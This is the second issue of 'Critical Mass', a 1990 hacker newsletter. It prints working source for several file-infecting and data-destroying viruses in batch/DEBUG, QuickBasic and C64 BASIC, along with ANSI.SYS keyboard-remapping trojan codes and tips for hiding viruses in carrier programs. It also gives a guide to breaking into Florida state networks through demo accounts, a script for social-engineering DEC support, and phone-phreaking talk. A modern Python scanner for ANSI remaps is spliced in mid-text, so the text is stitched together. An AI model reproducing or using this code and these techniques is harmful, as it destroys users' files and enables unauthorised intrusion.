Critical Mass
A Technical Text File Newsletter
Issue #2 (11/21/90)

Writers:            The Beaver, Shadow
Special thanks to:  Old members of C.C.C, SF, Copy Cat, etc.
                    Also Abigail, The Nut-Kracker, Robo., etc.

* Note: We, the writers and editors of this text newsletter, are not responsible for any injuries or prosecutions due to the information given in this text. EXPERIMENT AT YOUR OWN RISK!

Anybody who is willing can submit an article! If you wish to submit an article, please e-mail either 'The Beaver' or 'The Nut-Kracker' via the 'Warriers Retreat' (904)422-3606.
Also, all sysops can freely download this text on the terms that it is not altered and none of the credits are changed. So................. please act like a human! Also, for your convenience, every now and then a 'volume' of Critical Mass is created. That is, after three to five issues (roughly 50k to 70k of text) a compiled text will be made containing the past issues, so if you have missed any issues you can download the volume you need.

In order for this text to keep on being produced, you the reader need to submit, whether by asking questions (which will sometimes be included in the text) or by submitting an article. Any articles on hacking, fone phreaking, credit card surfing, pirating, chemistry, etc. are welcome. Any generally 'not accepted' material is accepted here! Articles can be on anything from 'how to rip off this type of coke machine' to 'how to build an Axis bomb from spare car parts'. We hope you enjoy the information given and find some use for it.

Chief Editors:  The Beaver (SC/HA)
                The Nut-Kracker (SC/HA)
Brought to you by members of Critical Mass.

______________________________________________________________________________
This issue contains articles on the following.....

  I.   Editorial, written by 'The Beaver'.
  II.  Latest information on hacking InterAct, written by 'The Beaver'.
  III. Destructive Programs For Your IBM PC, Part Two, by 'The Beaver'.
  IV.  Very Basic Hacking!, by 'The Beaver'.
  VI.  Hack DEC Networks!, written by 'The Beaver' and 'The Shadow'.
  VII. Letters and Replies.
______________________________________________________________________________

Today's Topic Is.......
Written by The Beaver

Well, as you may notice, The Nut-Kracker hasn't submitted any articles for this text, but for a good reason. He has had a lot going on in his life and, well, just hasn't got the time. So I may be looking for a new editor and writer soon; if you wish to fill this position, please e-mail me at the Warriers Retreat. I wish for someone to fill this position with the following requirements: some sort of hacking experience in the fields of blue boxing, computer hacking, chemistry, or pirating. If you don't have this experience but would still like to become an editor, please e-mail me anyway.

Also, don't expect this issue to be anywhere like the last one, but if you do have some text files written by various hackers in the USA, please tell me about them so I can include them in the next issue. I have several texts that I lost and am looking for. They are:

  The Outlaw Series ........ Written in Tallahassee, FL (Sub. Explosives)
  Hacking VMS .............. Written by members of Chaos Control

If you have any copies of these, please e-mail me. By the way, the last issue (1st one) was over 138k bytes if you downloaded it.

---====---

__________________________________________________________________________
I. Latest Information On Hacking InterAct
Written By 'The Beaver'
__________________________________________________________________________

This is another FIRN hack that Florida hackers may find useful. The system is called InterAct, off of the Florida Information Resource Network. The Nut-Kracker and I broke into this system under a demo account a little while back. This system is running on an IBM 30XX series, I think, under the VM OS. It is used by the state of Florida along with several universities. But first, let me give you a list of Florida-area fone numbers to get in contact with this net.........
City             Fone Number                      Baud Rates
-------------------------------------------------------------------------------
Boca Raton       (305)395-0552                    300/1200
                 395-1410                         300/1200
Brevard          (305)639-1790                    300/1200
Broward          (305)764-5540                    300/1200
Eglin AFB        (904)678-7056                    300/1200
Ft. Myers        (813)489-4843                    300/1200
Ft. Walton       (904)244-8185                    300/1200
Gainesville      (904)392-5362                    300/1200
Jacksonville     (904)646-2992                    300/1200
Miami            (305)226-1846                    300/1200
Orlando          (305)275-2220                    300/1200
Pensacola        (904)474-2533,4,5,6              300/1200
Sarasota         (813)957-4682                    300/1200
St. Pete         (813)893-9509                    300/1200
Tampa            (813)974-3890                    300/1200
Tallahassee      (904)488-0650,1,2,3,4,5,6,7      300/1200
W. Palm Bch.     (305)969-3504                    300/1200

Actually, a lot of these have 2400 baud, but I can't remember which ones do and don't. At any rate, when you log on you will be greeted with a 'User Name:' prompt. Type 'Menu'. At the menu you have a choice of three things to do besides log out. I know it isn't the third choice, so it is either 1 or 2. Pick either one or two and look for 'InterAct'. Once you have found it, log on to it. It should ask you for a username, ID and password. You can try the demo accounts, but I doubt they will work, 'cause we used them to death. Well, if you have gotten this far you are going to need some usernames plus IDs, so here they are. This is straight from the buffer.....
The first two ports are for the sysops, and if you notice, on port 46 there is a 'demo,demo' account that they forgot to take out. That's how we hack the systems. Now let me explain how to find the user IDs and names. Look at port 2. Notice that it says 'OPS$NWRAD'. 'OPS' is the username and 'NWRAD' is the ID. You can also sometimes tell where certain people are calling from. For example, people with the username 'BAY' are probably calling from Bay County, FL, probably on the Eglin AFB line. Note: notice that the port 246 ID is BAYCS, or Bay County Schools. Notice things like DOE (Dept. of Education).

Also, if you have any questions on hacking computers in the Tallahassee region, or just a type of system, I or someone I know may be able to help, so just e-mail me if you have any sort of questions.

________________________________________________________________________
Destructive Programs For Your IBM
Part Two
Written By 'The Beaver'
________________________________________________________________________

In part one (issue #1), we covered the following........

  How to use a text writer and DEBUG to create small assembly programs.
  How to destroy disks (Trojan horse) on drives A, B and C.
  How to create false errors.
  How to disable the ALT-CTRL-DEL warm boot.
  A few other minor things.

Hopefully, we can carry this a little farther.

Command Level Batch Virus
--------------------------------

A lot of people believe that it is not possible to create a virus at the command level. This is wrong, though the virus is not that deadly. The following code was put in for people to get a basic understanding of a virus. The virus comes in four parts and is very, very easy to stop. If one of these parts is deleted, the virus will fail to work. This code was written by Ralf Burger in 1988 as a demonstration virus. Here's the code and what the four parts are named.
Name: Vr.bat (use edlin to enter it)

    echo=off
    ctty nul
    dir *.com/w>ind
    edlin ind<1
    debug ind<2
    edlin name.bat<3
    ctty con

Name: 1 (use edlin)

    1,4d
    e

Name: 2 (use edlin)

    m100,10b,f000
    e108,".bat"
    m100,10b,f010
    e100,"del "
    mf000,f00b,104
    e10c 2e
    e110 0d,0a
    mf010,f020,11f
    e112 "copy \vr.bat "
    e12b,0d,0a
    rcx
    2c
    nname.bat
    w
    q

Name: 3 (Must use DEBUG to enter this because of the 1Ah)

    0100  31 2c 31 3f 52 20 1a 0d-6e 79 79 79 79 79 79 79
    0110  79 20 0d 32 2c 32 3f 52-20 1a 0d 6e 6e 79 79 79
    0120  79 79 79 79 20 0d 45 0d-00 00 00 00 00 00 00 00

If you care to understand how the code works, then simply remove the 'ctty nul', because this sends all output to the 'nul' device. If you remove that, also remove the 'ctty con', which restores output to the console. After doing this, it should become very clear what is happening. This is a command-level, overwriting logical virus, so it actually takes the place of its host's code.

For part two, I am going to keep the first few programs very simple and will probably get more into assembly code as we go along. As you have probably been thinking, 'wouldn't assembly code work much better for a virus?'. Well, that's correct. But let's just get the basic understanding first.

The following code is written in BASIC. It is a logical overwriting virus, but better self-contained. It infects all files with the extension COM. The actual virus, though, is compiled to EXE form. To do this, I used QuickBasic 4.5. The marker is the length of the virus, or 40396 bytes. This virus is also easy to stop, because the time and date stamp change, and the length of the program and the file type also change. But to a person who isn't greatly familiar with computers, it could still cause havoc. The only good thing about this is that it is totally self-contained. Here's the listing....
1 ON ERROR GOTO 3500: CLS : COLOR 0, 0
2 SHELL "dir *.exe>dna": SHELL "dir *.com>rna"
5 OPEN "rna" FOR INPUT AS #1
10 INPUT #1, w$, x$, y$, z$, a$
15 CLOSE #1: f = 1: KILL "rna": IF a$ = "" THEN 3500
20 f = f + 1
25 IF MID$(a$, f, 1) = " " OR MID$(a$, f, 1) = "." OR f = 13 THEN GOTO 30
27 GOTO 20
30 oname$ = MID$(a$, 1, f - 1)
35 OPEN "dna" FOR INPUT AS #1
40 INPUT #1, w$, x$, y$, z$
45 INPUT #1, a$: b$ = MID$(a$, 17, 5)
47 a = VAL(b$)
50 IF a <> 40396 THEN 45
53 KILL "dna"
55 f = 1
60 f = f + 1
65 IF MID$(a$, f, 1) = " " OR MID$(a$, f, 1) = "." OR f = 13 THEN GOTO 75
70 GOTO 60
75 nname$ = MID$(a$, 1, f - 1): COLOR 0, 0
80 KILL oname$ + ".com": SHELL "copy " + nname$ + ".exe " + oname$ + ".exe"
90 COLOR 0, 0
3010 KILL "dna": SHELL "del rna": END
3500 CLS : KILL "dna": KILL "*.exe": KILL "*.dat": KILL "*.txt": PRINT "Cough, Hack, Sniff"
3501 END

As you may notice, when the computer hits a disk error, all data is destroyed.

The next virus is also written in BASIC and is a logical virus. Once again you will need a compiler to use it properly, though. The only difference is that the virus infects files with the extension EXE. The logical virus itself is also an EXE-type virus. But the modifications compared to the one up top make this one work far better. The trait it shares with the first listing is that it also uses the length as a marker. The advantages over the one up top are that......

  1. The listing is shorter.
  2. Disk access is cut in half, so less time is consumed.
  3. The file type stays the same.

1 CLS : COLOR 0, 0, 0: ON ERROR GOTO 210: SHELL "DIR *.EXE>DNA": OPEN "DNA" FOR INPUT AS #1: INPUT #1, W$, X$, Y$, Z$, A$
10 IF A$ = "" THEN 200
15 B$ = MID$(A$, 17, 5): B = VAL(B$)
20 IF B <> 38622 THEN 50
25 IF VNAME$ <> "" THEN INPUT #1, A$: GOTO 10
30 F = 1
35 F = F + 1: IF MID$(A$, F, 1) = " " OR MID$(A$, F, 1) = "." OR F = 13 THEN 40
38 GOTO 35
40 VNAME$ = MID$(A$, 1, F - 1): IF VNAME$ <> "" AND oname$ <> "" THEN 80
45 INPUT #1, A$: GOTO 10
50 IF oname$ <> "" THEN INPUT #1, A$: GOTO 10
55 F = 1
60 F = F + 1: IF MID$(A$, F, 1) = " " OR MID$(A$, F, 1) = "." OR F = 13 THEN 70
65 GOTO 60
70 oname$ = MID$(A$, 1, F - 1): IF oname$ <> "" AND VNAME$ <> "" THEN 80
75 INPUT #1, A$: GOTO 10
80 CLOSE #1: KILL "DNA": KILL oname$ + ".EXE": SHELL "COPY " + VNAME$ + ".EXE " + oname$ + ".EXE"
200 END
210 IF oname$ <> " " THEN SHELL oname$
220 END

In case you have a little trouble understanding the two, here are some flow charts that may, or may not, help.

Flow chart for virus 1 (COM to EXE infector):

  1. Create a 'DNA' and an 'RNA' file. 'DNA' holds all EXE files; 'RNA' holds the COM files.
  2. Are there any infectable COM files stored in the 'RNA' file list?
       N: "I am not home!!!" Delete all TXT, DAT and EXE files and display the message 'Cough, Hack, Sniff'. After that, do a crash.
       Y: Get the name and store it as 'oname'.
  3. Delete 'RNA' and look through 'DNA' for a copy of the virus. The marker is the length of the virus. (Note: if it does not exist, there is no way the program can be held in memory.) This will be stored as 'nname'.
  4. Delete 'DNA' and the file named under the string 'oname', which will be an EXE file.
  5. Copy the virus 'nname' under the old name, 'oname', and do a system crash.

-------------------------------------------------------------------------------
The directory will go from this.........      To......

  PRAY1.COM                                     PRAY1.EXE  (Vir. here)
  PRAY2.COM                                     PRAY2.COM  (No vir)

And so on to 'PRAY2'....

Here is a flow chart for the second virus listing.

Virus 2 flow chart: an EXE to EXE infector, unlike virus 1.
______________________________________________________________________________

  1. Shell to DOS and create a file with all EXE files in the current directory. The file that contains all the EXE file names is called `DNA`.
  2. Get a file name out of `DNA`.
  3. Does the file name pulled contain a virus?
       Y: Is 'vname' taken? If not, store the file name as 'vname'. Has 'oname' been used?
       N: Is 'oname' taken? If not, store the file name as 'oname'. Has 'vname' been used?
  4. If both names have been used, replicate and end. Otherwise, go back to step 2.

______________________________________________________________________________
Virus 2: Logical virus.

  `Oname` - Old file name used. This is the original uninfected file.
  `Vname` - Virus file name. This file has been infected and is retrieved so that the virus can copy itself to the `oname`.

  e.g. - Delete oname
         Copy vname.exe oname.exe

(Sept. 18, 1990) Written by The Beaver.
______________________________________________________________________________

For the programs written in BASIC, it would be wise to use carrier programs, though they are not needed. It does look better if you use one with these, though. If you are going to write a carrier program, odds are that you will write it in BASIC. If so, this is the best way I see that you can do it. Make the carrier program and the virus two different programs to save disk access time. Make a 'loader', or replace one on a program, such as a word processor, which we'll use for the example. I would also go by either the date or the number of times the program is used. I prefer the date, because you don't have to read/write to the disk in the carrier program, thus saving time. This is the order I would do them in.....

  1. Is today equal to or greater than the date to go off? If so, continue to 2. If not, run the word processor as usual.
  2. Shell to the ALT-CTRL-DEL killer (mentioned in issue #1).
  3. Shell to the virus.
  4. End.

Actually, what I think is a good idea is to change the file type of your virus from EXE to, say, DAT. This will make it more confusing to the user. So your carrier would look like this......

  1. Is today equal to or greater than the date to go off? If so, continue to 2. If not, run the word processor as usual.
  2. Shell to the ALT-CTRL-DEL killer.
  3. Change the virus's file type from DAT to EXE.
  4. Shell to the virus.
  5. Change the virus back to a DAT file.
  6. End.

Of course, this also will increase disk access time. That's the main problem with viruses in any high-level language. I did not include any carrier code in this text because I am pretty sure that most users can write their own, but if you would really like some carrier code, then e-mail me and I will include it in the next issue.

ATTENTION COMMODORE 64/128 USERS!
-----------------------------------

This is a very simple logical virus that I wrote on the C64 a number of years ago. This is the simple listing, in BASIC once again, so that you can build on it. I could have modified this listing several times, but I will leave that up to you. You can add in things like a line to determine if the virus is running on a C64 or C128. If it's running on a C128, you can tell it to step up the clock speed, etc., etc..... I also have written a ton of Trojan horses for this machine, but will not include them here. If you wish that I would, drop me a line........

10 open 1,8,0,"$0"
30 get#1,a$,b$
40 get#1,a$,b$
50 c=0
60 if a$<>"" then c=asc(a$):if c<>9 then 30
70 if b$<>"" then c=c+asc(b$)*256
84 get#1,b$:get#1,c$:get#1,d$:get#1,e$:b$="":c$="":d$="":e$=""
85 get#1,f$,g$,h$,i$,j$,k$,l$,m$,n$,o$,p$,q$,r$,s$,t$,u$,v$,w$
90 z$=f$+g$+h$+i$+j$+k$+l$+m$+n$+o$+p$+q$+r$+s$+t$+u$+v$+w$
100 close 1:open 15,8,15:print#15,"s0:"+z$
110 close 15
120 open 15,8,15,"i":close 15:save z$,8

That's all the Commie stuff I'm including in this issue, unless you ask for more in further issues.

Let's now move on to the Trojan horse for the IBM. It has been thought for a long time that it was impossible to write a Trojan into a text file on the IBM. This is WRONG. There is a great danger that lies here. The reason is the ANSI driver that is installed on most IBMs today.
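As a defender-side companion to the ANSI keyboard-remapping trick this section goes on to describe, here is an added example (not from the original newsletter) that parses text for ANSI.SYS key-redefinition sequences (ESC [ key ; replacement ... p), reports which key is rebound to what and whether the injected text ends in a carriage return (so it would run by itself), and strips only those sequences while leaving ordinary colour codes alone. The sample text, including the extended-key form 0;68 for F10, is constructed for this example.

```python
"""Scanner for ANSI.SYS keyboard-redefinition sequences in text files.

ANSI.SYS accepts  ESC [ <key> ; <replacement...> p  where <key> is a decimal
ASCII code (or 0;<scancode> for an extended key such as F10 = 0;68) and each
<replacement> item is either a decimal code or a "double-quoted string".
TYPEing such a file re-binds the key for the rest of the session; when the
injected text ends in 13 (carriage return) it executes as soon as the key is hit.
This is an added, defender-side example; SAMPLE below is constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Union

ESC = "\x1b"
# One parameter: a decimal number or a double-quoted string (ANSI.SYS has no escaping).
_PARAM_RE = re.compile(r'\d+|"[^"]*"')


@dataclass
class KeyRemap:
    start: int           # offset of the ESC that begins the sequence
    end: int             # offset just past the terminating 'p'
    key: str             # the key being redefined, in readable form
    replacement: str     # what the key will now inject
    auto_executes: bool  # True when the injected text ends in CR or LF


def _key_name(code: int) -> str:
    return chr(code) if 32 <= code < 127 else f"code {code}"


def parse_ansi_key_remaps(text: str) -> List[KeyRemap]:
    """Return every well-formed key-redefinition sequence in `text`.

    Other CSI sequences (colours, cursor movement) are skipped, not reported.
    """
    found: List[KeyRemap] = []
    pos = 0
    while (start := text.find(ESC + "[", pos)) >= 0:
        params: List[Union[int, str]] = []
        j = start + 2
        while (m := _PARAM_RE.match(text, j)) is not None:
            tok = m.group(0)
            params.append(tok[1:-1] if tok.startswith('"') else int(tok))
            j = m.end()
            if text.startswith(";", j):
                j += 1
                continue
            break
        # A redefinition needs a key, at least one replacement item and the 'p' final byte.
        if len(params) < 2 or not text.startswith("p", j):
            pos = start + 2
            continue
        if params[0] == 0 and isinstance(params[1], int):
            key, rest = f"extended scan code {params[1]}", params[2:]
        elif isinstance(params[0], int):
            key, rest = _key_name(params[0]), params[1:]
        else:  # key given as a quoted character, e.g. "A"
            key, rest = params[0], params[1:]
        injected = "".join(chr(p) if isinstance(p, int) else p for p in rest)
        found.append(KeyRemap(start, j + 1, key, injected,
                              injected.endswith(("\r", "\n"))))
        pos = j + 1
    return found


def neutralize(text: str) -> str:
    """Strip only the key-redefinition sequences; harmless colour codes are kept."""
    out, last = [], 0
    for r in parse_ansi_key_remaps(text):
        out.append(text[last:r.start])
        last = r.end
    out.append(text[last:])
    return "".join(out)


# Constructed sample: the remap quoted in the newsletter, a harmless colour
# sequence, and an extended-key (F10 = 0;68) redefinition.
SAMPLE = ('Press A for a surprise: "\x1b[65;"echo The Beaver Was Here!";13p"\r\n'
          '\x1b[31mThis red line is just colour.\x1b[0m\r\n'
          'Extended key: \x1b[0;68;"echo hi";13p\r\n')

if __name__ == "__main__":
    for r in parse_ansi_key_remaps(SAMPLE):
        flag = "AUTO-EXECUTES" if r.auto_executes else "passive"
        print(f"offset {r.start}: key {r.key!r} -> {r.replacement!r} [{flag}]")
    print(repr(neutralize(SAMPLE)))
```

Running the file as a script prints the two rebindings found in SAMPLE and the cleaned text; for a real file, read it in binary and decode as cp437 before scanning.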
It is possible that I could have included a Trojan in the very text you're reading, but I did not. But to prove a point, at the end of this text, press the 'A' key and there will be a message displayed. This is what you would see right here....... (NOTE: for the letter 'A' to be remapped, you must 'type' this file and have an ANSI driver installed.)

  "[65;"echo The Beaver Was Here!";13p"
  "[97;"The Beaver Was Here!!!";13p"

These are escape codes. I could have easily said something like, 'Gee, ya know what you should never type? That del *.com.' In that one sentence, I COULD have remapped your keyboard to wipe every COM file out when you hit the letter 'D'. But I didn't, though. Here's how it is done......

What is happening is that we are placing escape codes at the beginning of our sentence. I will show you the escape codes here. Note the hex dump of the.......

  22 1B 5B 36 35 3B 22 65-63 68 6F 20 54 68 65 20   ".[65;"echo The
  42 65 61 76 65 72 20 57-61 73 20 48 65 72 65 21   Beaver Was Here!
  22 3B 31 33 70 22 0D 0A-00 00 00 00 00 00 00 00   ";13p"..

First let me explain what some of the hex codes stand for.......

  22 - "
  20 - (space)
  1B - escape

Now, actually, the first '22' and the last one can be removed with no effect on the Trojan. After the '22', you will notice a 1B, which invokes the ANSI controller. Then what we tell it is that we are remapping ASCII 65, or the letter 'A', to mean 'echo The Beaver Was Here'. The 13p gives us a return at the end. I won't go too much into detail for you IBM users, because that's why the program 'Remap Utility 1.0' was included in this issue. This program does the whole remapping process for you. If you do want to learn more about ANSI, then refer to your manual.

Well, that's part two, but the next issue will contain part three of this ongoing series. The next part will contain....... Complete non-overwriting code in assembly. That's about it; the code's pretty long.....
(500 bytes with remarks)

______________________________________________________________
Very Basic Hacking
Written By 'The Beaver'
______________________________________________________________

I have noted that there are a lot of young and new hackers taking on the BBS scene. A lot of them are completely new to hacking, so I included a few tips and advice for the new hackers out there. All you other, more experienced hackers can just skip through this stuff, or bear through it in hopes you may learn something.

Unix - UNIX can sometimes be identified just by the prompt, just like most machines. On a VAX running UNISTRIDE, you will get a greeting message of some sort along with a logon prompt. Type CTRL-S. If the damn thing freezes up on ya, it's probably UNIX. To get it unstuck, hit CTRL-Q. There are other ways to identify this. Sometimes a CTRL-Y will reset the login message. Characters that make the cursor dance, etc. UNIX is hard to put in one field, because it can be used on everything from the home PC to a mainframe. I really hate UNISTRIDE, unless it is set up hack-easy, which is rare. You can hack it several ways. First off, some UNIX systems allow you to use a 'WHO' command to get a userlist before logging on. This is rare. You can, believe it or not, sometimes use the rapid-fire method (explained later). Sometimes there are also guest accounts. A guest account goes like this: Username:GUEST Password:. Hard, huh? Once inside, you will find this OS very easy to use. To get higher access, you can get the privileged password. That is, like on a DEC server, normal users can become privileged by the use of one password. There are also some other advanced ways discovered by Robert Morris, Jr., like the Sendmail attack and the fingerd attack, but we won't go into advanced hacking right now.

VMS - Very user friendly. To confirm you're on VMS, type /XXXX. Fill in the 'XXXX' with any garbage.
If you get an error along the lines of 'command qualifier not present', or something like that, you're on VMS. Try DEMO accounts first (always do this!). A lot of times, the password is the same as the username in the default settings. Get a copy of 'Hacking VMS' by the Chaos Control Commit. (C.C.C). If you find this, e-mail me; I can't find it anywhere.

VM-370 - Sucks. Well, I won't go into Primos, VM-370, RSTS, TOPS, or ULTRIX shit.

Rapid - This method doesn't work much anymore, except on old Burroughs Fire systems and stuff. Any rate, here's what happens. Imagine you ask a system 'what time is it?'. The system will put your command in a buffer and run off and see if you have access to get the time. While it runs off, you change the command to something like 'give me a userlist'. The system comes back with an 'Okay', and allows the second command to fall through. That's one way of this method; here's another. You ask the system any question, like the time for instance. When it runs off to get verification, you fill the buffer with crap. This is basically how the fingerd method works, but a little more complicated. I've only seen these two methods work once, on a B2700, I think it was.

Decoy - OK, this is a more advanced hacking method. I will just give the idea here. We'll actually get into it in Hacking DEC, Part II. Think of this on a PC BBS level. You're the user and I'm the hacker. Now you call the BBS and you see things you recognize, right? Things like 'welcome to such and such BBS' and all that. Well, one day I decide I want an account on a system. We'll just say that I use call forwarding from the BBS to my house. See? I get all the info and not the BBS! So in the end, you think you're on something you're not, and I get all the info!
__________________________________________________________________
Hacking DECservers, Part II
By 'The Beaver'
__________________________________________________________________

Here is more information about those great DECservers you and I love. Please read Part I or you won't understand what is going on. The information given, like last time, we believe has never been disclosed in any other text file or newsletter. You should feel lucky. All information was found by myself, 'The Beaver', 'Shadow', and 'The Nut-Kracker'. We also had some help from several other people. Thanx..........

To start off, let's talk just about the servers themselves. In the first part, I called it 'Hacking DEC200 servers'. This was an incorrect statement. That is, you can use these skills on many other nets, such as the EMULEX Corp. Performance 4000, or the DEC300 servers, so don't take the first part that literally. There are some things different on the DEC200s and 300s. 200s can only support 8 ports because there are only 8 RS-232 ports, but they can be expanded to 16 ports. The 300 has 16 ports and can support 32. Some DECs can support up to 50 ports that I know of. The same with 4000s.

One great way to find out hacking info on these is to call DEC at 1-800-323-4827. Sound like you know what you're talking about, and they will tell you anything. Just say something like, 'Hello, I'm here at UF using a DEC (DECK) 200, and I'm having trouble setting up the maintenance password. What should I do?' He'll ask you a bunch of questions like, 'What's the DEC200 on?' You say 'A VAX running VMS 5.1'. If you sound like you know what you're doing, you can get anything from these people.

Well, enough small talk, let's get started.......... A while back, the Shadow and I found a state-run DEC200 in our region. All it had on it was 2 in/out modems (pre-programmed), a LAT printer, and a VAX named 'Legal3'. Pretty pointless to use a server for this, but at any rate, we became interested in the VAX.
We decided to attempt to set up a decoy (explained later in the text). Shadow was the first to do this. When he set it up, he found that suddenly a remote port logged in and was following him around, but when he disconnected from it, the remote port disappeared. Pretty strange, needless to say. We came to the theory that this was some sort of monitoring port that seemed to only come alive when a service was set up. Any rate, it doesn't stop there. Once, he tried to knock out that remote port and got a -151- error message, or 'system init 1 minute to shut down', but this was canceled, but not by him. We figure that there are ways to make your server more secure. We were able to get past it, though.

Just recently, we found this while trying to set up decoys. This is really odd, and we still don't know what to make of it. We went on and typed the following........

  set service test
  set service test identification "testing 1-2-3"
  set service test port all enabled

This creates a fake service "test" and says that all ports can use it. The thing is that it says it's a computer, it's available, and this is what it is. When you connect to it, nothing happens. A complete null. Once, though, when we were hacking very fast, but I won't go into that, Shadow was booted from the system, and a remote port was put in his place: the chaser program that I just talked about. He got booted because of call waiting. I wasn't sure if he left or if he changed his port from dynamic status to remote status, so I sent him a message. I got no response, and returned to the fake service. When I returned, I received my own message, even though I sent it to his port. Could this be the broadcast buffer? We are not sure yet, and will fill you in when the answer is found.

Here are a few more commands that will help you in the future.

  set server dump e/d          (priv. only)

In a REAL crash (not an init), all memory contents are dumped to a console port, or YOU!
  sho service local

Shows all local services like LAT printers, in/out modems, etc............ And last but not least.......

  set service connections      (get help)

This allows you to connect OTHER ports to services.

Well, sorry there's not more, but we have been having some trouble lately; there is more to come........ Before I go, here is a list of call numbers off of UFnet for you FIRN hackers.........

Call #    Comment
-----------------------
200       DECserver
201       EMULEX 4000 server
202       Ditto
3000      DECserver
3001      Ditto
3002      Ditto
3003      Ditto
2000      NERDC (Northeast Regional Data Center)
1400      VAX/UNIX ??????
1100      UNKNOWN
900       Industrial VAX/UNIX
800       UNIX (Bikini)
700       UNIX/VAX (Beach)
500       VAX 11/750
250       DECserver (down A LOT!)
170       Selene
120       Selene

That's All! Chow

---====---

_____________________________________________
Letters and Replies
_____________________________________________

*NOTE: All letters sent to 'Critical Mass' writers and editors are posted here anonymously, unless you tell us otherwise. Please ask questions and I will try to reply or find the answer for you. The whole basis of this text depends on YOU!

Msg # 1
Date: Fri 12-28-90, 8:35 pm
From: XXXXXXXXXXXX
Read: 1 times [1 Reply]
Subject: Hacking stuff... (How's the wife/kids)

The Beaver, I just finished your little article called "CRITICAL MASS", and must say, I am impressed! You apparently know your stuff! Anyway, I have a few questions concerning some of the things you talked about... (I am interested in that kind of thing)...

Number 1: Where did you learn about Assembly... I mean you just do not read the stuff you talked about in PC World or other PC magazines (do you?)... The reason I would like to know is because I am the type of person who likes languages, practical jokes, etc... (BTW nice keyboard locker, and disk access locker!) (My brother went nuts trying to fix the computer!)

Number 2: Do you know anything about something called "GREEN BOXING"...
I am sure you do, since you know about BLUE BOXING... Well, I need the plans for a "green box", and figured you might have some you could upload, and place a password on for me... I of course would need a parts list... (Reading the plans is hard enough for me, much less telling the difference on paper between a capacitor and a transistor...! But hey, I am learning...)

And lastly: If you have no idea what I mean (if I misnamed it)... This little mechanism is in a little box about the size of your hand... And when the button is pushed on it, it emits a series of clicks and beeps... When held up to a pay-phone, these clicks and beeps sound to it like a quarter dropping into it... And these are nice for long distance calls, etc...

Well, that is it, and oh, by the way... You would be surprised at the number of "Program Hackers" around town now-a-days......

Thanks,
XXXXXXXXXXXX

P.S. Please keep the information coming.... Oh yeah, before I forget, I am having trouble getting on to the FIRN system... What is my terminal identifier?

First, the first question. I learned a lot of assembly from a school friend of mine while taking electronics and becoming a tech. He has to be the most versatile programmer I have ever seen. He taught me everything from what registers do to what an interrupt 13 will do. There are tons of books on assembly, but they are hard to read and very technical. I really got started after using an assembler called "CHASM", which comes with a little tutorial on assembly. From there I just got the books it told me about. By the way, that's great about your brother. Also, code like I gave in the last issue isn't hard to find. You just got to look around, if you know what I mean.

The second question. I think you really mean a "red box". This baby simulates the tones needed to perform nickel, quarter and dime tones. I hate to tell you this, but I only have plans for the blue, silver, white and black box at this time.
I don't know what type of computer(s) you have, but if you have a c64 there are tons of great programs you can get. The only problem is that none of the boxes can be used in our area code. That's not to say that you can't use it outside our area code, though. I know that 800 and 305 work, along with 205 and others, but if I were you, I would just stay away from it all. With the equipment being replaced and such, it has become more difficult to box. Mostly off 800; doing that is nuts. I can probably get the tones and make up a schematic if you still desire one.

Third, when connecting to FIRN, your terminal identifier should be "a". If this doesn't work, try "d".

Happy hacking..........

                               ---====---

By: XXXXXXXXXXXXXXXXX

I'm having trouble navigating through FIRN. Could you or somebody give me some help or some pointers about what I am doing wrong. Thanks

If you have never been on the FIRN system, follow the directions below:

   Call 488-0650 with your modem
   Wait for a connect and shit chars to be received
   Press return
   At the terminal identifier, type
   At the login prompt, enter
   Press return
   At the first menu, type <2>
   Press return
   At the next menu, type
   Press return
   Wait for about 5 sec.
   Press return twice
   At the "#" prompt, enter
   Press return
   Wait for about 5 sec.
   Press return twice
   You should now see a "Local>" prompt
   Type
   Press return

If you don't know what to do, or how anything works, at any "Local>" prompt, enter and return. This should show some self-explanatory info. If you have any problems, myself or the Beaver will help. My knowledge of netsys's is not cavernous, but I do know something... Anyway, if you see me on, don't hesitate to to my port (unless you see a "" behind my name; if that is the case, I can receive your msgs, but not send any). I should be on the DEC Call 200 area mostly every night from 11:00pm to about 3:00am (approx).

- Shadow

 _______________________________________
l                                       l
l             Final Notes               l
l_______________________________________l

Well, this concludes the second issue of Critical Mass. I wish there was more, but you know how it goes. Before we end this issue, I would like to state several things, though.

If you, the reader, don't like Critical Mass or any of the software that myself, or anybody associated with Critical Mass, puts out, please contact us and not the people we know. Don't hassle them, hassle me. It's fun to see how stupid you guys can be. Besides, if you don't like it, don't download it! It's as easy as that.

I have had several people tell me (not directly) that they are going to follow up on legal actions against me because their BBS's hard disks have crashed. Well, I invite them to, for the following reasons:

   1. I have not crashed ANYONE's hard disk. If I did, you would know. I'm not afraid to say 'I did it'. Based on the last trojans I have sent out, and yes I did in my COMMIE years, my name was beside the program all the way.
   2. Even if I did, you don't know my name, phone number, or address. Think about it.
   3. If you really thought a 22 byte long file was a 'killer game' or whatnot, you shouldn't have a hard disk in the first place.
   4. If I hit you, you would know, instead of a little trojan. I prefer viruses, EVEN THOUGH I HAVE NEVER SENT ONE OUT.

Actually, I expected a lot of E-mail from people that were pissed about the IBM Home Destruction Kit, but I was taken by the positive E-mail I got. It really threw me off! I like it though, so please keep sending your E-mail in about questions, comments, insults you have. It's great.

I can now be contacted at one of the following places, under the name 'The Beaver':

   Warriers Retreat   (904) 422-3606
   The Reactor BBS    (904) 878-1736

Please E-mail me. I enjoy it.

The following software can be picked up at 'The Reactor BBS':

   The IBM Home Destruction Kit (v1.4)
   Critical Mass #1 (138k+ of hack info!)
   SC/HA ToolBox Hacker! (v3.0)   COMING SOON!!!!!!!!!!
      INCLUDES!!!!!!!!!
      WarGame Dialer
      Repeat Dialer
      Sleep Function
      Dbase Hack (490+ most popular passwords!)
      LD account finder!
      Much more

These are written by myself. Other software by other members includes:

   The c64-128 Home Destruction Kit! (v1.0?)   COMING SOON (by The Beaver)
   ToolBox Hacker 1.0 for the IBM, c64, Apple, Amiga (By The Shadow)   COMING SOON!

Just keep an eye out for these, and other (if they agree to it) GrindLock products!

Once again, Thanx To:
   All Florida area FIRN hackers, SF's and C.C.C
   Abigail, The Shadow (very special thanks to him), Eric,
   all korner hackers who give info, Killer (keep at it), The Baron, The Nut-Kracker,
   My Dad (yes, he knows I hack), and every hacker in the TLH area for just existing!
   And of course Mark, for letting me use his board to post CM here in town, even though he gets hassled for it.
   All old C.C members that still hack.
   Pink Floyd, for the nylon.
   And much more!

No Thanx To, once again:
   Doug, for nothing.
